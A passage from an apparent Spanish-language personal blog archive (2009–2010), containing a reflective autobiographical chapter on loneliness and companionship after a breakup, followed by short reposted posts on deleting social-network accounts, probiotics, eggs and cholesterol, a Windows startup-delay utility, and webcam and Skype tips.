El asunto fue que no pude salir con nadie a quien yo se lo propusiera. Ese día que anduve con Vanesa, ella y yo nos pusimos de acuerdo para recibir el año nuevo, juntos, el cual estaba a unos pocos días.

 

En la mañana del 31 de diciembre, la llamé para ponernos de acuerdo sobre la hora a la cual nos veríamos; me dijo que no podría verme.

 

Para colmo, ese día mi hermano andaba de viaje con unos amigos, se había ido desde el 29 y volvía el 3 de enero.

 

Aunque pudiera parecer que los pocos días en los cuales fui a pasear eran suficientes, por la partida de Dina y a causa de no estar en el trabajo ni en la universidad, me sentía mucho tiempo en soledad. Además, esos ratos de diversión fueron bastantes cortos. En relación con toda esta situación, pensaba:

 

Tras de ya no tener a Dina después de haberme acostumbrado a su presencia, todo el mundo me deja solo, lo peor es que como soy una persona de pocas amistades, ya agoté todas las posibilidades.

 

En esa soledad que a mí me resultaba tan dolorosa, pasé todo diciembre. Nunca había tenido unas vacaciones, navidad y año nuevo, tan horribles.

 

Los primeros días de enero -cuando ya había retornado al trabajo y estaba a punto de entrar a la universidad nuevamente-, me empezó a pasar que, cuando me encontraba desocupado, sentía una gran necesidad de reflexionar sobre la soledad que viví durante esos días. Una noche en mi casa me cuestioné:

 

¿Por qué sucedió eso?, parecía como si alguien o algo hubiese decidido que yo estuviera sólo. Fue demasiada casualidad que no hubiera con quien pasear precisamente cuando todo el mundo había salido de clases y estaba sin trabajar.

 

Empecé a reflexionar acerca de si existe algo que a veces nos guía hacia cierto camino y muchas veces no le hacemos caso. Consideraba lo acaecido como mucho más que casualidad, sentía como si todo se hubiera puesto de acuerdo para dejarme a solas y mostrarme algo.

 

En ocasiones anteriores, había notado como en muy poco tiempo me sucedían varios acontecimientos relacionados, pareciendo como si alguien intentara enseñarme algo, es decir, dando la impresión de ser más que una coincidencia. Por ello me pregunté:

 

¿Qué debo aprender? ¿Cuál es el significado de lo sucedido? Puedo notar que el destino me proponía estar solo, pero por qué, si yo odio eso, a mí me gusta estar rodeado de gente con la cual compartir, ¿por qué ese algo que parece estar guiando parte de mi vida no me brinda compañía en vez de soledad?

 

En ese momento una voz dentro de mi mente susurró:

 

“Quien no está preparado para la soledad

tampoco está preparado para la compañía”

 

Me quedé sorprendido ante esas palabras. Estuve bastante rato en absoluto silencio, con esa idea en la mente.

 

Después, de un pronto a otro comencé a sentir que comprendía profundamente esa frase, y en un instante empezó a surgir en mi mente, una gran reflexión al respecto, pero de una forma sumamente fluida y sencilla. Es decir, era yo quien pensaba pero al mismo tiempo sentía como si alguien me dijera las palabras:

 

¡Quien no está preparado para la soledad, tampoco está preparado para la compañía! ¡Es verdad! A veces busco la compañía, pero no precisamente por el gusto de tener a cierta gente a la par, sino por el temor a estar solo.

 

Estar preparado para la compañía implica no pretender eternizarla, más bien, es saber y aceptar que puede acabar. También es, no creer que obligatoriamente la compañía acarrea alegría, y la soledad, tristeza. La felicidad y la desdicha pueden hacerse presentes, independientemente de si me encuentro o no, con alguien.

 

Si no estoy preparado para la soledad, veré la compañía de una manera muy nociva; como mi salvación o el único motivo para ser feliz.  Eso podría llevarme a creer que si una relación no dura para toda la vida, entonces es un fracaso, lo cual puede provocar el aferrarme a relaciones destructivas.

 

Por eso, si no estoy preparado para la soledad, tampoco lo estoy para la compañía, ya que el recibirla me producirá daños emocionales, debido a que en vez de compartir y disfrutar, crearé dependencia y sujetaré mi felicidad a la presencia de esa persona.

 

Por eso muchas personas se aferran a quien no les hace sentir bien; “porque estoy muy viejo para encontrar a alguien que me quiera”, “porque todas las personas que pasan por mi vida son iguales, entonces debo aceptarlo”, “porque le amo y no puedo dejarle”, y por quien sabe qué cosas más. Pero todo se resume en su gran temor a recorrer la vida, solos.

 

Y cuando muchas personas se deciden a abandonar esa relación que tanto daño les hace, dicen algo así como; “estoy solo pero pronto eso cambiará, debo esperar para que algún día llegue el gran amor de mis sueños”, lo cual en apariencia podría parecer un pensamiento positivo, pero no lo es, porque al no aceptar plenamente lo que la vida le entrega -la soledad-, está alimentando el temor a ésta.

 

Eso es lo que se ha hecho en nuestra cultura; creer que durante los momentos de soledad, la dicha se ausenta. Muchas canciones románticas parecen promover un sentimiento muy positivo al afirmar que alguien al fin encontró la verdadera dicha y un motivo para existir cuando conoció a la persona con quien se encuentra, lo cual puede parecer muy bonito, pero es igual que escuchar una de esas canciones que muestran la partida de la pareja como una gran desgracia que estropea por completo las ganas de vivir. Desde ambas perspectivas hay temor a estar solo.

 

Lo mismo sucede con algunas novelas televisivas, las cuales consisten en echarse a morir por tener a alguien al lado. Seguramente su auge se debe a que incluyen dos características muy importantes de la vida sentimental de mucha gente; la primera es lo que realmente viven, y la segunda es lo que les gustaría vivir. Lo que viven es el dolor, la obsesión, el sufrir más que gozar, a causa de alguien. Lo que les gustaría vivir es el encontrar a su alma gemela, esa relación perfecta con una pasión de adolescente que dure para toda la vida, con alguien sumamente atractivo, inteligente y de hermosos sentimientos, que les comprenda y ame siempre.

 

Si hasta ahora, sin darme cuenta me he identificado con eso o por lo menos con una buena parte, será mejor empezar a cambiar, porque no sé cuántos serán los días que pase a solas y quiero aprovechar al máximo cada uno de ellos.

 

Un momento después de haber pensado en todo eso me dije:

 

Bueno, me siento un poquitín mejor al ver todo lo que he aprendido en tan poco tiempo. Parece que debo aprender a ver mi soledad de manera positiva, pero ¿cómo hago eso si siento lo contrario?

 

Me quedé en silencio acostado en el sillón durante un rato, con esa pregunta en la cabeza. Después de un rato volvió a surgir en mí, una gran comprensión de forma espontánea y fluida, la cual dio lugar a que de una manera rápida y continua, comenzara a pensar:

 

En primer lugar, debo entender que la alegría no depende de la compañía, sino de mí mismo y mi capacidad para estar bien en cualquier momento, viviendo de la manera más satisfactoria posible. Cuando comprenda eso dejaré de esforzarme tanto por tener a alguien a mi lado y no me aferraré a relaciones inconvenientes, ni a ideales amorosos esperando que algún día traigan consigo la dicha.

 

En segundo lugar, debo aprender a fijar mi atención en el momento que estoy viviendo, no en el que ya pasó o en el que está por venir. He dedicado mucha energía a comparar mi soledad actual con la compañía que alguna vez tuve, con la que podría tener o con la que algún día llegará, y a causa de ello termino concentrándome en momentos que, o ya han pasado, o no han llegado, y dejo de prestarle atención al instante más importante; mi presente. Es decir, esperando ese “gran” momento del mañana desaprovecho el hoy.

 

Me sentí satisfecho por haber podido pensar eso, sin embargo, después de un pequeño rato se me ocurrió que también era necesario entender qué es soledad y qué es compañía. Entonces continué reflexionando:

 

¿Qué significan esas dos palabras? Entiendo por soledad el no estar con alguien cerca, aunque también me puedo sentir solo teniendo gente alrededor. Cuando estoy con alguien puedo decir que estoy acompañado, pero ¿a partir de qué momento dejo de estar con alguien? Si me encontrara con Dina, la tengo abrazada y le estoy hablando, podría decir que estoy en compañía de ella, si nos distanciamos un par de metros y continuamos hablando, podría decir que sigo con ella. ¿En qué momento dejamos de estar juntos?

 

Si nos separamos varios kilómetros de distancia, sí podríamos decir que ya no estamos juntos, ¿por qué?, treinta kilómetros o dos metros, ambos siguen siendo una medida, y de cualquier manera ya perdí el contacto físico con ella, ¿será a causa del no poder interactuar?

 

Sin embargo, si me encontrara con ella acostado en la misma cama, no le estoy mirando, ni hablando, ni tocando, y en ese momento alguien me pregunta por teléfono si estoy con alguien, probablemente respondería que sí. Entonces no necesito interactuar para sentirme en compañía.

 

Si ella se acabara de ir a trabajar y estuviera a menos de diez metros de la casa, y alguien me llama para preguntarme lo mismo, seguramente contestaría que no. Entonces ¿cuál es la diferencia? ¿El que los dos no nos encontremos dentro de esa estructura llamada alcoba o casa? Pero sí estamos dentro del mismo vecindario, país, planeta y universo.

 

Si me comunicara vía Internet con ella, ¿estamos juntos o no? Si estoy hablándole, escuchándole y observándole a través de una pantalla, puedo decir que estamos interactuando, pero como nos separan cierta cantidad de kilómetros, entonces ¿estoy o no con ella? ¿Me puedo sentir en soledad a pesar de estar interactuando con alguien?, ¿o acompañado sin hablar con nadie y tal vez hasta sin tener a ninguna persona a la par?

 

Si me encuentro en un estadio rodeado de mucha gente, pero llegué allí sin ningún conocido, y me preguntan por teléfono si estoy solo, yo respondería afirmativamente, aunque en ese momento esté pasando a través de un tumulto y teniendo contacto físico con muchas personas. Incluso podría dirigirle la palabra a un hombre para pedirle que me venda un refresco y aun así sentir que estoy solo. ¿O podría sentir lo contrario si quisiera?

 

¿Será que todo es cuestión de interpretación? Yo pude en algún momento, llegar a mi casa creyendo erróneamente que Dina se encontraba durmiendo en la alcoba, si en ese instante me hubiesen buscado para preguntarme si me encuentro con alguien, yo hubiera respondido que sí, porque eso es lo que creo. Entonces, ¿será que todo depende de la actitud y de lo que se quiera creer?

 

Después de pensar en eso, me quedé nuevamente en silencio y unos instantes después pude responder:

 

“Soledad” y “compañía” podrían ser la misma cosa. Equivocadamente se utiliza esta última palabra para referirse al hecho de estar a cierta distancia de alguien, pero siempre estaré a cierta distancia de alguien. Lejos o cerca, es relativo.

 

Compañía no es estar lo suficientemente cerca de una persona como para poder interactuar, ya que también puedo comunicarme con quien se encuentra a muchos kilómetros de mí.

 

El poder ver, oír o sentir a otra persona tampoco son características indispensables de la compañía, ya que ésta puede existir aun en la oscuridad, el silencio y la distancia.

 

Siempre tendré la misma cantidad de soledad y de compañía, percibir una cosa u otra, depende de mí.

 

 

Comprender eso me ayudó a enfrentar la partida de Dina, al saber que podía seguir con ella todo el tiempo que quisiera.

 

Es decir, había entendido que -a pesar de ser necesario dejar de esperarla y extrañarla-, no tenía porqué dejar de estar con ella, ya que siempre se puede estar con las personas queridas, independientemente de poder o no, hablarles, mirarles y tocarles.

 

En ese momento supuse que quizás esa fue la enseñanza del destino cuando me mantuvo lejos de mis amigos; que de igual manera ellos estaban conmigo.

 

Al comprender que la compañía no se encuentra condicionada por la distancia, pude entender que el amor tampoco.

 

Cuando Dina era mi novia y me despedía de ella para ir al trabajo, yo sentía que seguía conmigo, pero porque estaba seguro de volverla a ver más tarde. Ahora, aunque nuestra relación había acabado, yo sabía que si deseaba, podía seguir sintiéndome junto a ella.

 

Eso no significa que me encontraba dispuesto a seguir eternamente enamorado de ella, lloriqueando y deseando su regreso. Más bien, estaba aprendiendo que el “estar” con alguien tiene muchas formas, y debía aceptar la de ese momento en vez de quejarme.

 

Después de pensar en todo eso me levanté del sillón, fui a mi alcoba y empecé a escribir algo que un rato después pegué en la pared de mi cuarto, con el fin de estarlo leyendo cuando me entristeciera, decía:

 

No debo establecer diferencias entre la soledad y la compañía, ambas son lo mismo percibido de manera diferente.

 

Nunca estoy solo, ya que siempre estoy con gente a mi alrededor, a unos pocos metros de distancia o a miles de kilómetros, en el mismo salón o en el mismo planeta.

 

Pero al mismo tiempo siempre estoy solo, porque nunca ninguna persona llega a fusionarse con mi ser.

 

Estoy con todos y al mismo tiempo no estoy con nadie, ya que soy parte del “todo”, pero por más que interactúe con alguien e influyamos uno sobre el otro, siempre seremos seres individuales, en ningún momento uno se adherirá al otro.

 

Cuando me aflija por la soledad en la cual me encuentro, pensaré que siempre cuento con la presencia de mí mismo. Debo valorar mi propia compañía antes de recibir la de otros, para así no perderme por encontrar a alguien.

 

Caminaré conmigo a través de mi soledad que en realidad es compañía, y cuando me encuentre acompañado recordaré que siempre estoy solo.

 

No volveré a confundir compañía con cercanía y mucho menos con felicidad, porque cometería el gran error de ver la soledad como sinónima de tristeza.

 

Dejaré de considerar la compañía y la soledad como un objetivo o algo a evitar, sino como momentos que la vida me ofrece; con la misma disposición que acepte uno, aceptaré el otro. De esa manera, nadie me engañará brindándome falsa compañía.

 

Al terminar de escribir esas líneas, las leí con detenimiento y un rato después me dije a manera de conclusión:

 

Hay momentos para estar a solo, y momentos para estar acompañado, nada más, y ninguna situación es mejor que la otra.

 

Pero esa conclusión la asimilé mejor, cuando un rato después surgió de nuevo una voz en mi mente -dándome la idea con la cual debía finalizar lo que había escrito-, diciendo:

 

“Nadie vino para quedarse eternamente... quien llega, en algún momento tendrá que partir”

 

 

 

 

 

 

 

Capítulo 4

Después de haber meditado tanto, me convencía más de que las cosas no suceden por casualidad; la vida se puso de acuerdo para dejarme en soledad con el fin de que yo la sintiera en carne propia, y así aprendiera a vivir con ella en vez de buscar un escape falso.

 

Posteriormente a mi reflexión sobre la soledad y la compañía, mi mente estaba un poco más clara, por lo cual me di cuenta de que inconscientemente, mi interés por salir con algunas personas, hasta cierto punto era ir con ellos a algún bar juvenil de mala muerte, en el cual pudiera tomar licor en exceso, oír música a un volumen ensordecedor y quizás conocer a una mujer con quien aliviar mi angustia mediante sexo. Todo para saturar mi mente y olvidar mi aflicción. Pero esa fuerza guiadora de mi vida, consideró preferible que yo me encontrara a mí mismo en soledad, en vez de perderme por buscar compañía.

 

Además, el tener la mente más clara, me llevó a pensar que tal vez la supuesta soledad de diciembre, era simplemente verdadera compañía. Esto, porque ciertas personas estaban dispuestas a verme cuando yo quisiera; mi hermana, mis abuelos, mi madre y su esposo. Aunque en el momento no lo noté, todos hubieran recibido mi visita cualquier día, pero ellos no estaban interesados en ir a un bar donde hubiera un inaguantable olor a tabaco y marihuana, música barata a todo volumen y muchas personas deseosas de apagar sus problemas con sexo y alcohol. Al parecer, sin estar del todo conciente de ello, eso era lo que yo deseaba.

 

No quiero decir que las personas con quienes no pude salir no fuesen verdadera compañía, sí lo eran, pero a casi todos los busqué con el fin de tener con quien ir a algún bar, y no precisamente para conversar un rato, sino más bien para escapar de mí mismo temporalmente.

 

Nada fue casualidad, todo sucedió por un motivo especial. No sé cómo explicar eso que dirigió mi vida hacia un determinado rumbo, para enseñarme el valor de la soledad y no dejarme caer en el escape que buscaba para según yo, olvidarme de Dina. Algunos le podrían llamar Dios, otros quizás dirán que es la misma vida. Alguien tal vez lo vea como una energía desconocida que puede ayudarnos en ciertas ocasiones.

 

Pienso que aparte de eso, puede ser también el poder de la mente, la cual es capaz de encaminarnos hacia lo que en el fondo de nosotros sabemos, es más importante. Muy en mis adentros, sabía que era preferible aprender a convivir con la soledad en vez de pasarme la vida evadiéndola.

 

Sin embargo, en esos momentos de confusión, estaba muy influenciado por mi dolor como para reflexionar al respecto. Pero esa fuerza inexplicable para mí, me empujó hacia lo más adecuado.

 

No sé cuál es el motivo de ese cúmulo de “casualidades” que a veces intentan dirigirnos hacia un objetivo, me parece bastante difícil el acontecimiento de muchos sucesos relacionados, únicamente por pura coincidencia.

 

De hecho, esas supuestas casualidades no ocurrieron sólo cuando terminé con Dina, también hubo algunas bastante curiosas, mientras estuvimos juntos e incluso antes de empezar nuestra relación, o sea, cuando acabábamos de empezar nuestra carrera y nos veníamos conociendo. En relación con eso hay una historia interesante.

 

Cuando ingresé a la universidad a estudiar sicología, estaba tan entusiasmado con ello que por primera vez en mucho tiempo me propuse dejar de pensar en relaciones de pareja. En ocasiones anteriores yo sentía muchos deseos de tener una novia con la cual compartir, pero por algún motivo todas mis relaciones eran problemáticas o demasiado vacías. Por lo cual, frecuentemente soñaba con conocer a alguien especial a quien pudiera querer. Al decidirme a estudiar esa carrera tan apasionante para mí, me dije:

 

De ahora en adelante, dejaré de pensar tanto en hacerme de una novia para concentrarme en mi carrera. Si llegara a tener una relación tendría que ser con alguien de la misma universidad, para tener mayor facilidad de verla. No pienso gastar tiempo viajando hacia algún lugar muy lejano con el fin de verle, sabiendo que podría estar empleándolo en mis estudios.

 

Sin embargo, no voy a la universidad a buscar novia, voy a estudiar, debo tener eso presente. Si de forma espontánea aparece alguien, está bien, pero si no es así, no importa.

 

En esos días fue fabuloso sentir como, sin el menor esfuerzo, podía cumplir lo que me había propuesto. Desde varias semanas antes de entrar a la universidad había dejado por completo, de pensar en relaciones de pareja, situación que era poco usual en mí. Al llegar el primer día de clases fue igual, la mayoría de compañeras eran mujeres, algunas estaban muy guapas, y aun así ni siquiera me pasaba la idea por la mente.

 

Creo que eso sucedió gracias a la felicidad producida por estar estudiando una carrera tan hermosa para mí. Lo que antes había intentado llenar inútilmente con relaciones de pareja, ahora estaba empezando a hacerlo mediante el interés en una profesión.

 

A la salida del segundo día de clases conocí a Dina, le hablé con la simple intención de conversar, ahí descubrimos que habíamos matriculado las mismas materias.

 

Al día siguiente, cuando acababa de subirme al autobús para ir a la universidad, pensé:

 

Ahora veré en clases a Dina... mmm, algo me dice que voy a terminar enamorado.

 

No sé por qué surgió esa ocurrencia en mí, cuando hablé con ella el día anterior, en ningún momento pensé en nada parecido. Pero lo más sorprendente fue que justo en ese instante, levanté la vista y ahí estaba Dina pagándole el pasaje al chofer. Esa fue la primera gran “coincidencia”; topármela justo cuando estaba pensando en ella.

 

Se sentó junto a mí y muchas más “coincidencias” surgieron cuando empezamos a hablar; nos gustaba la misma música, odiábamos las mismas cosas, opinábamos igual acerca de la religión, la política, los deportes, la televisión, las costumbres populares, la sexualidad, las relaciones familiares y muchas otras cosas, lo cual nos asombró, ya que ambos éramos personas bastante radicales en algunos de nuestros planteamientos, por lo cual, siempre nos había resultado difícil encontrar gente con formas de pensar similares a las nuestras. Sin embargo, por alguna asombrosa razón éramos muy similares en casi todo.

 

Después de eso, estuvimos varios días hablando únicamente como amigos y sorprendiéndonos de ver cuánto nos parecíamos.

 

La primer semana de nuestro noviazgo yo le conté que cuando nos topamos en el autobús, yo venía pensando en ella como una persona de la cual me enamoraría, y que ahora, lo más curioso para mí era, no sólo haberla visto ahí ese momento, sino también el haber empezado posteriormente, una relación de pareja con ella. Al terminar de contarle, Dina respondió asombrada:

 

_ No lo puedo creer

_ ¿Por qué? -respondí-

_Porque yo también venía pensando en ti justo cuando me saludaste en el autobús.

_ ¿En serio? ¿Qué estabas pensando?

_Solamente recordando cuando estuvimos hablando el día anterior, y me sorprendí de verte ahí.

 

Al terminar esa conversación ambos quedamos atónitos. Nos parecía una “gran casualidad” venir pensando uno en el otro justo cuando nos topamos, y al hablarnos descubrir que ninguno de los dos, nunca habíamos conocido a alguien con quien tuviésemos tanto en común.

 

Después, esa idea de las “grandes casualidades” era reforzada constantemente al descubrirnos muchas características de personalidad similares. También al contarnos lo que uno opinó del otro cuando nos vimos por vez primera en clases; antes de hablarnos, a ambos nos pareció que el otro tenía un carácter poco agradable.

 

Durante la relación sucedieron algunas cosas bastante extrañas, pareciendo ir más allá de la coincidencia, como que -sin habernos avisado ni hablar nada-, nos hiciéramos un regalo uno al otro el mismo día, y lo más curioso de todo, nos obsequiamos la mis


Publicado por jacintoluque @ 22:07
Comentarios (0)  | Enviar
Viernes, 15 de enero de 2010

Posted: 14 Jan 2010 12:42 PM PST

Screen shot 2010-01-14 at 2.34.49 PM

Usualmente, cancelar o borrar una cuenta en Facebook, Hi5, Twitter y demás servicios resulta bastante molestoso / complicado porque, al fin y al cabo, a nadie le gusta perder usuarios, verdad?

Delete Your Account es un servicio que nos muestra, paso por paso – y links directos, en la mayoría de los casos – cómo eliminar nuestra cuenta en los múltiples servicios que la lista enumera.

 

Screen shot 2010-01-14 at 2.40.32 PM

Además, el servicio nos muestra información, específica de cada uno de los servicios, que nos dirán cómo – si es que es posible, claro – reabrir o recuperar sus cuentas. Basta con elegir una letra para buscarlo, o simplemente buscarlo en la barra principal de la página, y prepárense para desaparecer de la web!

 

Link 

via technospot

Similar Posts:

Publicado por jacintoluque @ 8:25
Comentarios (0)  | Enviar
Martes, 12 de enero de 2010
Lunes, Enero 11, 2010

Los bífidus y ‘Lactobacillus’ presentes en los yogures son unos microorganismos que, según se ha demostrado, estimulan el sistema inmunológico. Lo que no está tan claro es la cantidad que se debe ingerir para conseguirlo.

El intestino, además de ser el órgano por donde se asimilan los nutrientes, desempeña un importante papel en la defensa del organismo. El tubo digestivo representa la principal vía de entrada de los microorganismos externos. De ahí que esté muy protegido por el sistema inmunológico. De hecho, concentra el 70% de las defensas de todo el cuerpo.

La flora microbiana intestinal va colonizando el tracto del niño en sus primeros días de vida y cambia con el tiempo por factores externos como la dieta, el clima, la medicación o el estrés.

En los adultos, esta flora intestinal puede llegar a estar compuesta por unas 2.000 especies bacterianas diferentes, de las que sólo 100 podrían llegar a ser perjudiciales. Un equilibrio bacteriano perfecto mantiene nuestro sistema natural de defensas. Pero este equilibrio puede verse vulnerado por enfermedades, cambios no favorables en la alimentación, por el estrés, al envejecer…

En la última década del siglo XX, la industria alimentaria comenzó a desarrollar nuevos productos con funciones adicionales a las del alimento original gracias a la interrelación de disciplinas como la biología molecular, la biotecnología y la nutrición. Nacen así los llamados alimentos funcionales, integrados en dos categorías: prebióticos y probióticos.

Según la doctora Pilar Riobó, jefe asociado de endocrinología y nutrición de la Fundación Jiménez Díaz de Madrid, los prebióticos son sustancias no digeribles de la dieta que estimulan selectivamente el crecimiento y/o la actividad de uno o más tipos de bacterias en el colon. Éstas, a su vez, son beneficiosas para el hospedador. Es el caso, por ejemplo, de la fibra dietética (la inulina y la oligofructosa), que ayuda a regular el ritmo intestinal y a evacuar.

Los probióticos, según puntualiza Riobó, son microorganismos vivos que, cuando se ingieren en cantidad suficiente, mejoran el equilibrio de la flora intestinal y resultan beneficiosos para la salud: protegen contra los microorganismos patógenos, estimulan el sistema inmunológico y mantienen las funciones digestivas del intestino.

Para ser considerados probióticos, las bacterias deben resultar inocuas para la persona que las ingiere, llegar vivas al intestino (que es donde ejercen su función), tener capacidad antimicrobiana y de modulación de la respuesta inmunológica e influir positivamente en las actividades metabólicas. Además, tienen que ser capaces de establecerse por sí mismas, aunque sea temporalmente, en la flora intestinal y ser encontradas después en las deposiciones. Es el caso de los Lactobacillus acidophilus, los bífidus y las bacterias del yogur. “Las leches fermentadas que contienen estas bacterias son también alimentos probióticos”, apunta Riobó.

Al menos lo son “en teoría”, como advierte la endocrinóloga. “Si el fabricante cumple estrictamente todos los requisitos que se exigen para ello y, por supuesto, si no se rompe la cadena de frío hasta que llegan al consumidor”, puntualiza. Cabe preguntarse, entonces, qué cantidad de yogures tendría que consumir diariamente una persona sana o una persona con problemas digestivos para obtener los beneficios de los que antes se hablaba. Desgraciadamente, es algo que todavía no está claro. Aún no hay estudios concluyentes al respecto.

Se está investigando la utilidad de algunos probióticos en la prevención y tratamiento de diarreas agudas, producidas por los microorganismos conocidos como rotavirus. Los estudios iniciales indican que las bacterias probióticas ayudan a mantener un equilibrio bacteriano saludable, estimulan la inmunidad intestinal y evitan la aparición de organismos patógenos que causan las alteraciones intestinales y la diarrea.

“Además, se están llevando a cabo otros estudios sobre el posible papel de las sustancias probióticas en la prevención de la alergia, en la mejora del ritmo intestinal, en la regulación de los niveles de colesterol y en el control de la formación del cáncer”, añade.

Se ha observado, en palabras de esta experta, que ciertas enfermedades se relacionan con cambios en la composición o función metabólica de la flora intestinal, como los procesos diarreicos agudos o el síndrome del intestino irritable. En experimentos con animales se ha demostrado que las bacterias intestinales pueden desempeñar un papel determinante en el cáncer de colon y en la aparición de la enfermedad inflamatoria intestinal.

Muy recientemente han aparecido preparados probióticos (en pastillas), complementados con vitaminas y minerales, de venta en farmacias. Su verdadera acción está por demostrar, aunque los estudios clínicos son favorables.

La polémica está en la calle y las autoridades competentes han tomado parte en el asunto. No se trata de echar por tierra las virtudes de estos productos, sino de que todo quede “científicamente demostrado”. De hecho, la Agencia Europea de Salud Alimentaria ha solicitado la retirada de 350 anuncios de productos alimenticios que no demuestran ser beneficiosos para la salud, pese a que la publicidad lo afirme. Esto exigirá un mayor rigor a la industria alimentaria tanto al elaborar los alimentos como al anunciarlos a través de los medios de comunicación.


Publicado por jacintoluque @ 13:47
Comentarios (0)  | Enviar
Jueves, 07 de enero de 2010
Su mala reputación de los últimos años es infundada, no aumenta el colesterol y es un excelente alimento

ADIÓS AL MITO DEL COLESTEROL

El consumo de huevos ha soportado restricciones que hoy carecen de fundamento. Se ha sostenido durante décadas que los huevos son dañinos para el hígado, a pesar de que tal afirmación carece por completo de rigor científico. Sí es cierto que cuando se padece de piedras en la vesícula biliar o litiasis biliar, conviene reducir el consumo de huevos para evitar un cólico, pero también lo es que con esta patología hay que restringir la ingesta de grasas en general y no en particular la procedente del huevo. La comunidad científica, tras numerosos estudios realizados en muchos países estos últimos 20 años, ha llegado al convencimiento de que el huevo por sí solo carece de una capacidad relevante para aumentar los niveles de colesterol; por tanto, no se relaciona su consumo frecuente con un aumento de la posibilidad de sufrir infartos y enfermedades cardiovasculares. En estas patologías influyen más decisivamente otros factores, como la predisposición genética y los hábitos poco saludables como una vida sedentaria, el tabaco y el estrés y el consumo de alimentos ricos en grasas saturadas y grasas trans (provenientes, las trans, en su mayoría de las grasas vegetales parcialmente hidrogenadas, y presentes en productos procesados). El colesterol que contienen los alimentos no influye tanto como se pensaba en el aumento del colesterol plasmático total. De hecho, en el control de la hipercolesterolemia vinculada al consumo de alimentos hay factores más importantes, como la proporción existente entre ácidos grasos saturados y trans (los menos saludables) y los poliinsaturados (saludables). Y resulta que este perfil de la grasa, o lipídico, es saludable en el huevo. Además, el huevo aporta lecitina, que ayuda a mantener en suspensión el colesterol en sangre, impidiendo que se deposite en la pared de las arterias. Por tanto, nada de restringir en exceso el consumo de huevos, si bien quienes sufren hipercolesterolemia deben moderar su consumo, al igual que el de otros alimentos ricos en colesterol o en grasa saturada. Niños, adultos de talla media y quienes no realicen gran actividad física pueden comer perfectamente 4 huevos a la semana; y las personas corpulentas o que practiquen deporte con frecuencia pueden llegar a los 7 huevos semanales.


Publicado por jacintoluque @ 20:07
Comentarios (0)  | Enviar
Domingo, 03 de enero de 2010

Posted: 02 Jan 2010 06:54 AM PST

 

De este programa hablamos ya el 2006,pero últimamente lo vengo utilizando bastante con ciertas PCs conhardware de hace 2-3 años, y me pareció que valía la pena mencionarlonuevamente.

Verán, cuando arrancamos la PC, ésta pasa por todo un proceso decarga, en el que empiezan a guardarse en memoria diversas partes nosólo del sistema operativo, sino de programas que tenemos instalados, yconfigurados para que inicien con el sistema.

El problema, es que en estos casos, Windows trata de cargarlos todosde golpe y a veces, nuestra PC no es lo suficientemente poderosa comopara lidiar con tantos programas (y el mismo Windows), luchando poresos recursos iniciales, para cargar. Se les hace familiar ese primerminuto o minuto y medio de arranque de nuestra PC en donde todo pareceestar congelado, mientras Windows trata de cargar el resto de cosas?

Ahora, Windows 7 ha mejorado un poco todo el asunto, pero aún asíhabrán ocasiones en las que el OS simplemente se “congele” por unossegundos, mientras intenta procesarlo todo.

Conozcan, pues, a Startup Delayer. El concepto es bastante sencillo: enlugar de tratar de lanzar todas las aplicaciones de golpe apenas seinicia nuestra PC, Startup Delayer nos permite añadir demoras, para quelos programas tengan un lapso de tiempo entre sí. En pocas palabras, demora la carga de algunas aplicaciones.

Así, por ejemplo, podemos hacer que el Antivirus cargueinmediatemente, pero demorar un poco la carga de MSN Messenger, u otrosprogramas no tan críticos. De esta manera, la PC no sólo cargará muchomás eficientemente, sino que además, los recursos del sistema podránser ocupados por unas pocas aplicaciones, en lugar de luchar todassalvajemente.

Este programa funciona muy bien en sistemas con 3-5 años deantiguedad, o sistemas de un sólo núcleo (como netbooks) y similares.Asimismo, es recomendable para cualquier versión de Windows, a pesar deque en 7 no sea tan necesario (gracias a las optimizaciones de cargaque este nuevo OS trae).

 

Descargar Startup Delayer

Similar Posts:

Publicado por jacintoluque @ 7:42
Comentarios (0)  | Enviar
Viernes, 01 de enero de 2010
En esta nota también encontrará consejos para evitar que se produzca eco cada vez que habla por Skype
Las webcams o cámaras Web son quizás uno de los accesorios menos explotados en una computadora. Aunque se las usa – en teleconferencias o en sesiones de vídeo menos formales, como un saludo de Navidad – muchos usuarios no saben cómo transmitir imágenes de alta calidad o cómo ajustar debidamente el micrófono o el software de transmisión de software.

Veamos algunas soluciones a estos problemas.

¿Hay una forma de mejorar la calidad de la transmisión de vídeo de las webcams?

La calidad del vídeo depende de muchos factores, incluyendo la calidad de la cámara en la webcam, la velocidad de la conexión a Internet y los ajustes que usted haya hecho – o no haya hecho – a la cámara mediante el software.

En cuanto a la calidad de la cámara, vale la pena gastarse un poco más de dinero en una webcam de alta calidad si va a usarla regularmente para transmisiones de vídeo online. QuickCam Pro de Logitech y LifeCam de Microsoft están entre las más altamente calificadas.

Según la webcam y el software que se esté usando para grabar, se puede controlar muchos de los aspectos del vídeo. En el software de su webcam, abra la ventana Ajustes o Settings (Herramientas, si usa Skype). Busque un botón Avanzados o de ajuste del vídeo, y vea si puede controlar los ajustes de brillo, contraste y, lo más importante, el balance del blanco. El balance del blanco es importante, pues determina la transmisión de una imagen con colores más naturales o más agradables. Recuerde que, si ajusta manualmente el balance del blanco, necesitará estar en una habitación con luz relativamente constante. De lo contrario, si las condiciones de iluminación cambian, cambiará también la tonalidad de la imagen.

Sobre la iluminación, la transmisión será siempre mejor cuando haya mucha luz. Las cámaras de vídeo, tal como las fotográficas, producen mejores imágenes cuando hay mejor luz. El destinatario recibirá imágenes definidas, sin imagen fantasma, si su entorno está bien iluminado. Trate de ubicar las luces frente a usted, tras la cámara y a ambos lados del rostro. Imagínese que estuviera grabando en un estudio de vídeo en miniatura y ubique las luces como las habrá visto en un estudio de televisión. Ajuste el balance del blanco de su webcam después de encender todas las luces.

También la posición de la webcam tendrá efecto sobre la cualidad estética de la transmisión de vídeo. Esencialmente se debe poner la cámara de modo que usted quede mirándola ligeramente hacia arriba. Colocar la cámara sobre la pantalla del PC es también aceptable. Lo que no se debe hacer es colocar la cámara sobre una mesa, con usted mirando hacia abajo, porque ello da una imagen muy poco halagüeña. Asimismo, ajuste su webcam y su asiento de modo que usted llene la totalidad del marco, con un pequeño espacio sobre la cabeza si usted está sentado. No transmita una imagen en la cual usted aparece pequeño dentro del marco.

Igualmente, si está usted mirando un vídeo de la persona con quien se comunica al tiempo de grabarse a sí mismo – es decir, si sostiene una teleconferencia de dos vías – asegúrese de colocar en la pantalla la imagen de su interlocutor directamente debajo de la lente de la webcam. De esta manera aparecerá usted haciendo contacto visual con esa persona.

ECO
Si su interlocutor oye un eco cada vez que habla por Skype usando una webcam, ¿tiene Skype la culpa de ello?

